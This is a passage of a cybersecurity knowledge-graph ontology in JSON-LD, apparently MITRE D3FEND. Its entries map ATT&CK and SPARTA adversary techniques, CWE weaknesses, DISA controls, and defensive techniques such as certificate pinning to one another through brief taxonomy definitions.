      "d3f:definition": "Commands a device to start or resume a service/program.",
      "d3f:modifies": {
        "@id": "d3f:OTControllerOperatingMode"
      },
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: SET PLC (RUN VS STOP)"
      ],
      "rdfs:label": "OT Run Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommand"
        },
        {
          "@id": "_:N3a1d7598f06b4938850c39c069632c1b"
        }
      ]
    },
    {
      "@id": "_:N3a1d7598f06b4938850c39c069632c1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "d3f:T1213",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Resource"
      },
      "d3f:attack-id": "T1213",
      "d3f:definition": "Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.",
      "rdfs:label": "Data from Information Repositories",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nfda6200cc156417a94b00ecb6ea9245b"
        }
      ]
    },
    {
      "@id": "_:Nfda6200cc156417a94b00ecb6ea9245b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:EXF-0008",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0008",
      "d3f:definition": "By breaching development or integration environments (at the mission owner, contractor, or partner), the adversary gains access to source code, test vectors, telemetry captures, build artifacts, documentation, and configuration data, material that is often more complete than flight archives. Beyond theft of intellectual property, the attacker can embed telemetry taps, extended logging, or data “export” features into test harnesses, simulators, or flight builds so that, once fielded, the system produces extra observables or forwards content to non-mission endpoints. This activity typically occurs pre-launch during software production and ATLO, positioning exfiltration mechanisms to activate later in flight.",
      "rdfs:label": "Compromised Developer Site - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0008/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAExfiltrationTechnique"
      },
      "skos:prefLabel": "Compromised Developer Site"
    },
    {
      "@id": "d3f:T1088",
      "@type": "owl:Class",
      "d3f:attack-id": "T1088",
      "d3f:definition": "Windows User Account Control (UAC) allows a program to elevate its privileges to perform a task under administrator-level permissions by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.002",
      "rdfs:label": "Bypass User Account Control",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.002"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000765_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements multifactor authentication for network access to privileged accounts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000765"
    },
    {
      "@id": "d3f:Software-definedRadioRFStateChangeEvent",
      "@type": "owl:Class",
      "d3f:definition": "A software-defined radio (SDR) event where one or more radio-frequency (RF) parameters have been changed in a way that affects reception or emission (e.g., center frequency retune, gain/attenuation update, bandwidth/filter selection, antenna/port switch, TX enable/disable, etc).",
      "rdfs:label": "Software-defined Radio RF State Change Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Software-definedRadioEvent"
        },
        {
          "@id": "_:Na581bb6d745a4c6aacb3593276c90d59"
        }
      ]
    },
    {
      "@id": "_:Na581bb6d745a4c6aacb3593276c90d59",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "d3f:T1136",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1136",
      "d3f:creates": {
        "@id": "d3f:UserAccount"
      },
      "d3f:definition": "Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.",
      "rdfs:label": "Create Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "_:N358b0922c6284dd5935343dc588bc72b"
        }
      ]
    },
    {
      "@id": "_:N358b0922c6284dd5935343dc588bc72b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1206",
      "@type": "owl:Class",
      "d3f:attack-id": "T1206",
      "d3f:definition": "The <code>sudo</code> command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\" (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code> that is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.003",
      "rdfs:label": "Sudo Caching",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:RawMemoryAccessFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:MemoryBlock"
      },
      "d3f:definition": "A function which accesses raw memory, usually using memory addresses.",
      "rdfs:label": "Raw Memory Access Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N8307051d88c5494cbeb184f563a30d4c"
        }
      ]
    },
    {
      "@id": "_:N8307051d88c5494cbeb184f563a30d4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:T1626.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1626.001",
      "d3f:definition": "Adversaries may abuse Android’s device administration API to obtain a higher degree of control over the device. By abusing the API, adversaries can perform several nefarious actions, such as resetting the device’s password for [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642), factory resetting the device for [File Deletion](https://attack.mitre.org/techniques/T1630/002) and to delete any traces of the malware, disabling all the device’s cameras, or to make it more difficult to uninstall the app.",
      "rdfs:label": "Device Administrator Permissions - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1626"
      },
      "skos:prefLabel": "Device Administrator Permissions"
    },
    {
      "@id": "d3f:T1422",
      "@type": "owl:Class",
      "d3f:attack-id": "T1422",
      "d3f:definition": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of devices they access or through information discovery of remote systems.",
      "rdfs:label": "System Network Configuration Discovery - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDiscoveryTechnique"
      },
      "skos:prefLabel": "System Network Configuration Discovery"
    },
    {
      "@id": "d3f:EXF-0003.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EXF-0003.01",
      "d3f:definition": "Here the target is command traffic from ground to space. By receiving or tapping the uplink path, the adversary collects telecommand frames, ranging/acquisition exchanges, and any file or table uploads. If confidentiality is weak or absent, opcode/argument content, dictionaries, and procedures become directly readable; even when encrypted, session structure, counters, and acceptance timing inform future command-link intrusion or replay. Captured material can reveal maintenance windows, contingency dictionaries, and authentication schemes that enable subsequent exploitation.",
      "rdfs:label": "Uplink Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EXF-0003/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EXF-0003"
      },
      "skos:prefLabel": "Uplink Exfiltration"
    },
    {
      "@id": "d3f:MessageHardening",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MessageHardening"
      ],
      "d3f:d3fend-id": "D3-MH",
      "d3f:definition": "The application of security controls to user-to-user and system-to-system communications so messages remain confidential, unaltered, and verifiable while resisting injection, replay, and tampering.",
      "d3f:enables": {
        "@id": "d3f:Harden"
      },
      "rdfs:label": "Message Hardening",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N77357bf005724a36980cee222e57b7b2"
        }
      ]
    },
    {
      "@id": "_:N77357bf005724a36980cee222e57b7b2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Harden"
      }
    },
    {
      "@id": "d3f:CreateSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:Pipe"
      },
      "d3f:definition": "A create socket system call creates an endpoint for communication and returns a file descriptor that refers to that endpoint.",
      "rdfs:label": "Create Socket",
      "rdfs:seeAlso": {
        "@id": "https://www.man7.org/linux/man-pages/man2/socket.2.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N208d6fe77ab742059eca87cfe2a36673"
        }
      ]
    },
    {
      "@id": "_:N208d6fe77ab742059eca87cfe2a36673",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:powered-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x powered-by y: x obtains its essential energy or force from y to perform its function or remain active.",
      "owl:inverseOf": {
        "@id": "d3f:powers"
      },
      "rdfs:label": "powered-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:depends-on"
      }
    },
    {
      "@id": "d3f:AssetVulnerabilityEnumeration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AssetVulnerabilityEnumeration"
      ],
      "d3f:d3fend-id": "D3-AVE",
      "d3f:definition": "Asset vulnerability enumeration enriches inventory items with knowledge identifying their vulnerabilities.",
      "d3f:evaluates": [
        {
          "@id": "d3f:PhysicalArtifact"
        },
        {
          "@id": "d3f:Software"
        }
      ],
      "d3f:identifies": {
        "@id": "d3f:Vulnerability"
      },
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-AutomatedComputerVulnerabilityResolutionSystem"
        },
        {
          "@id": "d3f:Reference-SecurityVulnerabilityInformationAggregation"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForVulnerabilityRiskAssessment"
        }
      ],
      "rdfs:label": "Asset Vulnerability Enumeration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N63aff903360b4776bf9069f0f7dfd046"
        },
        {
          "@id": "_:N6ff4578831ee41849b4ef7946c488d42"
        },
        {
          "@id": "_:N5a725bf2753a4b46b7d9d72b72f4cc6e"
        }
      ]
    },
    {
      "@id": "_:N63aff903360b4776bf9069f0f7dfd046",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "_:N6ff4578831ee41849b4ef7946c488d42",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:evaluates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "_:N5a725bf2753a4b46b7d9d72b72f4cc6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Vulnerability"
      }
    },
    {
      "@id": "d3f:T1111",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1111",
      "d3f:definition": "Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.",
      "d3f:may-access": {
        "@id": "d3f:SecurityToken"
      },
      "rdfs:label": "Multi-Factor Authentication Interception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N89433d9c2f5442a78545de22bc165984"
        }
      ]
    },
    {
      "@id": "_:N89433d9c2f5442a78545de22bc165984",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecurityToken"
      }
    },
    {
      "@id": "d3f:ResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Ephemeral digital artifact comprising a request of a resource and any response from that resource.",
      "rdfs:label": "Resource Access",
      "rdfs:seeAlso": {
        "@id": "dbr:Computer_access_control"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:UserAction"
      }
    },
    {
      "@id": "d3f:T1562.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.009",
      "d3f:definition": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)",
      "d3f:disables": [
        {
          "@id": "d3f:EndpointSensor"
        },
        {
          "@id": "d3f:SystemConfigurationInitDatabaseRecord"
        }
      ],
      "d3f:may-modify": {
        "@id": "d3f:EndpointHealthBeacon"
      },
      "rdfs:label": "Safe Mode Boot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:Nd94bd7c230074e68929f59ae2a720c5a"
        },
        {
          "@id": "_:N81598aee366c4302ad71433665dadbf7"
        },
        {
          "@id": "_:Ne096ba91e2bb4d399cfa9d5ddf7ee588"
        }
      ]
    },
    {
      "@id": "_:Nd94bd7c230074e68929f59ae2a720c5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EndpointSensor"
      }
    },
    {
      "@id": "_:N81598aee366c4302ad71433665dadbf7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationInitDatabaseRecord"
      }
    },
    {
      "@id": "_:Ne096ba91e2bb4d399cfa9d5ddf7ee588",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EndpointHealthBeacon"
      }
    },
    {
      "@id": "d3f:T1513",
      "@type": "owl:Class",
      "d3f:attack-id": "T1513",
      "d3f:definition": "Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android `MediaProjectionManager` (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android `screencap` or `screenrecord` commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)",
      "rdfs:label": "Screen Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Screen Capture"
    },
    {
      "@id": "d3f:CWE-1392",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1392",
      "d3f:definition": "The product uses default credentials (such as passwords or cryptographic keys) for potentially critical functionality.",
      "rdfs:label": "Use of Default Credentials",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1391"
      }
    },
    {
      "@id": "d3f:T1546.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.009",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. (Citation: Elastic Process Injection July 2017)",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "d3f:loads": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "AppCert DLLs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Nffc0e17b35404c4189e3532f64e65095"
        },
        {
          "@id": "_:N8e5e75f1c51d4a3f96e8e2c5ac817910"
        },
        {
          "@id": "_:N8794bd215abd4fc98f40c251642d0526"
        }
      ]
    },
    {
      "@id": "_:Nffc0e17b35404c4189e3532f64e65095",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:N8e5e75f1c51d4a3f96e8e2c5ac817910",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:loads"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N8794bd215abd4fc98f40c251642d0526",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:Reference-TechnicalProductGuideTriconSystems",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nrc.gov/docs/ml0932/ml093290424.pdf"
      },
      "d3f:kb-abstract": "Information in this document is subject to change without notice. Companies, names and data used in examples herein are fictitious unless otherwise noted. No part of this document may be reproduced or transmitted in any form or by any means, electronic or mechanical, for any purpose, without the express written permission of Triconex",
      "d3f:kb-organization": "Rockwell Automation",
      "d3f:kb-reference-of": {
        "@id": "d3f:DisableRemoteAccess"
      },
      "d3f:kb-reference-title": "Technical Product Guide Tricon Systems",
      "rdfs:label": "Reference - Technical Product Guide Tricon Systems"
    },
    {
      "@id": "d3f:has-prerequisite",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-prerequisite",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-use-case-object-property"
      }
    },
    {
      "@id": "d3f:CWE-1332",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1332",
      "d3f:definition": "The device is missing or incorrectly implements circuitry or sensors that detect and mitigate the skipping of security-critical CPU instructions when they occur.",
      "rdfs:label": "Improper Handling of Faults that Lead to Instruction Skips",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:ScheduledJobEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the lifecycle or management of scheduled tasks within a system, including creation, modification, execution, or removal.",
      "rdfs:label": "Scheduled Job Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/scheduled_job_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N3b3a6083c6a545afaf8f9dffdd10c79b"
        }
      ]
    },
    {
      "@id": "_:N3b3a6083c6a545afaf8f9dffdd10c79b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "d3f:ServiceUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing changes made to a service application, such as updates, reconfigurations, or patch installations, ensuring its continued availability and functionality.",
      "rdfs:label": "Service Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationUpdateEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:N968e96ce008447e4a6c47b28c0b6bd8b"
        }
      ]
    },
    {
      "@id": "_:N968e96ce008447e4a6c47b28c0b6bd8b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:GlobalUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A type of user account in Microsoft Windows (NT) that has a domain-wide scope.defines that user's access to a logical group of network objects (computers, users, devices) that share the same Active Directory databases; that is, a user's access to the domain.",
      "rdfs:label": "Global User Account",
      "rdfs:seeAlso": {
        "@id": "https://networkencyclopedia.com/global-user-account"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CCI-002010_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system electronically verifies Personal Identity Verification (PIV) credentials from other federal agencies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-002010"
    },
    {
      "@id": "d3f:CertificatePinning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CertificatePinning"
      ],
      "d3f:authenticates": {
        "@id": "d3f:PublicKey"
      },
      "d3f:d3fend-id": "D3-CP",
      "d3f:definition": "Persisting either a server's X.509 certificate or their public key and comparing that to server's presented identity to allow for greater client confidence in the remote server's identity for SSL connections.",
      "d3f:hardens": {
        "@id": "d3f:Certificate"
      },
      "d3f:kb-article": "## How it works\nPinning allows for a trusted copy of a certificate or public key to be associated with a server and thus reducing the likelihood of frequently visited sites being subjected to man-in-the-middle attacks. Certificates or public keys can be pinned after a trusted connection has been established or the pinning can be preloaded in an application, which is the preferred method for mobile applications.\n\nPinning can take the form of certificate pinning or public key pinning.\n\n## Forms of Pinning\n* Certificate Pinning (CP) allows for the client to verify the X.509 certificate with a preloaded certificate. Typically, this is involves storing a hash of the certificate and using the stored hash for comparison to the hash of the certificate submitted during the SSL handshake.\n\n* Public Key Pinning (PKP) requires the extraction of a public key from server's certificate. The stored public key is compared to the server's presented public key. A public key is expected to rotate less frequently than an X.509 certificate and is generally favored over certificate pinning.\n\nAn extension of PKP is Subject Public Key Information Pinning (SPKI) includes public key pinning plus additional information for SSL connections. The additional information can include preferred algorithms.\n\n## Considerations\n\n* With pinned certificates whenever a server updates its certificate, the pinned certificates will also need to be updated\n* With pinned public keys the extracted key may be subject to key refresh policies but much less frequently\n* Servers can become unavailable if pinned objects are set and not updated with the rotated identities. This may require a pinning strategy to be developed.\n* The application of this technique within web browser applications has been [deprecated](https://developer.mozilla.org/en-US/docs/Web/HTTP/Public_Key_Pinning) by  popular web browser developers. They now favor certificate analysis via public certificate transparency logs, and the EXPECT-CT HTTP header.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CertificateAndPublicKeyPinning"
        },
        {
          "@id": "d3f:Reference-End-to-endCertificatePinning"
        },
        {
          "@id": "d3f:Reference-PublicKeyPinningExtensionForHTTP"
        }
      ],
      "rdfs:label": "Certificate Pinning",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialHardening"
        },
        {
          "@id": "_:N53c0506adf524c8f9d1668dff9b7e87f"
        },
        {
          "@id": "_:N257ddcc0b4ce4f4e95cfa9c5e5d48f32"
        }
      ]
    },
    {
      "@id": "_:N53c0506adf524c8f9d1668dff9b7e87f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PublicKey"
      }
    },
    {
      "@id": "_:N257ddcc0b4ce4f4e95cfa9c5e5d48f32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:hardens"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Certificate"
      }
    },
    {
      "@id": "d3f:T1149",
      "@type": "owl:Class",
      "d3f:attack-id": "T1149",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "LC_MAIN Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CloudStorage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Cloud storage is storage held within a computing cloud.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Cloud_storage"
      },
      "rdfs:label": "Cloud Storage",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Cloud_computing"
        },
        {
          "@id": "https://schema.ocsf.io/objects/databucket"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:CCI-001069_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs automated mechanisms to detect the presence of unauthorized software on organizational information systems and notify designated organizational officials in accordance with the organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001069"
    },
    {
      "@id": "d3f:T1619",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:CloudStorage"
      },
      "d3f:attack-id": "T1619",
      "d3f:definition": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.",
      "rdfs:label": "Cloud Storage Object Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N168a51beefa54a7d987e729ecf66ab04"
        }
      ]
    },
    {
      "@id": "_:N168a51beefa54a7d987e729ecf66ab04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudStorage"
      }
    },
    {
      "@id": "d3f:ServiceStartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event representing the initiation of a service application, transitioning it from an inactive state to an active state, enabling its background or networked operations.",
      "rdfs:label": "Service Start Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationStartEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nc4a541c5590140c7aba0f2a6af13fb2e"
        }
      ]
    },
    {
      "@id": "_:Nc4a541c5590140c7aba0f2a6af13fb2e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceInstallationEvent"
      }
    },
    {
      "@id": "d3f:SlowSymbolicLink",
      "@type": "owl:Class",
